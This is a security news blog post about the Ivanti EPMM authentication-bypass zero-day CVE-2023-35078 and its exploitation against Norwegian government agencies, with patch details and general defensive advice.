The post Ivanti 0-day exploited to target Norwegian government appeared first on Gridinsoft Blog.

]]>
Software development company Ivanti (formerly MobileIron Core) has patched a zero-day vulnerability that allowed authentication bypass. This vulnerability had a maximum CVSS level and was actively exploited to gain unauthorized access.

What is Ivanti Company?

Ivanti is an IT software company headquartered in Utah, United States. It produces a variety of IT management and security solutions. Many organizations use the company’s products, including businesses, government agencies, and educational institutions. For example, almost all Norwegian ministries use Ivanti Endpoint Manager Mobile except a couple of ones. Having such important clients is always a huge responsibility, and unfortunately not everyone is capable of mitigating all the risks.

Ivanti EPMM 0-day Vulnerability

ACSC has received reports of a vulnerability in Ivanti EPMM (Endpoint manager mobile), also known as MobileIron Core, affecting all versions below 11.8.1.0. In brief, the vulnerability is CVE-2023-35078 and allows remote access to the API without authentication. It has the maximum severity rating of the CVSS scale and is a 10 out of 10 possible. While Ivanti said it received the information from a reliable source, the company did not disclose any further details about the nature of the attacks or the attacker’s identity behind them. Nevertheless, the Norwegian National Security Authority (NSM) confirmed that unknown attackers exploited the vulnerability to attack the State Organization for Security and Services (DSS). Thus, attackers could likely access and steal sensitive data from the compromised platform.

However, on Sunday, the company released a security patch that users can install by upgrading to EPMM 11.8.1.1, 11.9.1.1.1, and 11.10.0.2. However, versions below 11.8.1.0 that are outdated and unsupported have also received the update.

CVE-2023-35078 Details

CVE-2023-35078 is a zero-day authentication bypass vulnerability. It provides remote API access without authentication to specific paths. That is, an attacker can access personally identifiable information such as usernames, phone numbers, and other mobile device information on the vulnerable system. An attacker can also make configuration changes, including creating an EPMM administrator account for additional changes to the vulnerable system. The vulnerability affects all supported versions of EPMM (v11.10, 11.9, and 11.8) and earlier unsupported releases. However, the vulnerability is patched in versions 11.10.0.2, 11.9.1.1, and 11.8.1.1.1. Since CVE-2023-35078 has a maximum CVSS severity level of 10.0 and is easily exploitable, experts strongly recommend updating all devices, even EOL devices. Otherwise, if you cannot update the appliance, it is recommended to switch off.

CVE-2023-35078 vulnerability heatmap by countries image
CVE-2023-35078 vulnerability heatmap by countries

In addition, Ivanti has published a password-protected security advisory. However, only customers with login credentials can access it, which is perplexing. The company also clarified that the vulnerability is not used in a supply chain attack. IoT search engine Shodan found more than 2,900 MobileIron user portals are publicly available on the Internet, mainly in the US and Europe. About 30 of them are associated with local and state governments in the United States. The most vulnerable servers are in the US, Germany, the UK, and Hong Kong. The Norwegian National Cyber Security Center has notified all known system owners in the country that have MobileIron Core available on the Internet of a security update that has been issued.

How to secure against Ivanti 0-day vulnerability?

Well, the Norwegian government is not the only client of Ivanti. Companies from different corners of the world use their software, and appear to have a soft spot at the place no one expected. Here are some steps you can take to secure against the Ivanti 0-day vulnerability.

  • Apply the latest security patches. It’s the first action you must take since Ivanti has released a patch to address the vulnerability. So, you should apply the patch as soon as possible to protect your organization.
  • Use multi-factor authentication (MFA). It adds a layer of security to your organization’s IT systems. MFA requires users to use two or more pieces of identification to authenticate themselves. This way is making it more difficult for attackers to access your systems.
  • Monitor your IT systems for suspicious activity. You should monitor them for suspicious activity, such as unauthorized access attempts or unusual traffic patterns. As we can see, it will help you to identify and respond to attacks.
  • Educate your users about security best practices. Users are the first defense against cyberattacks. You should educate your users about safety best practices. For example, they must avoid clicking suspicious links or opening attachments from unknown senders.

By following these steps, you can help to protect your organization against the 0-day vulnerability and other cyberattacks.

The post Ivanti 0-day exploited to target Norwegian government appeared first on Gridinsoft Blog.

]]>
https://gridinsoft.com/blogs/ivanti-zero-day-norwegian-government/feed/ 0 16297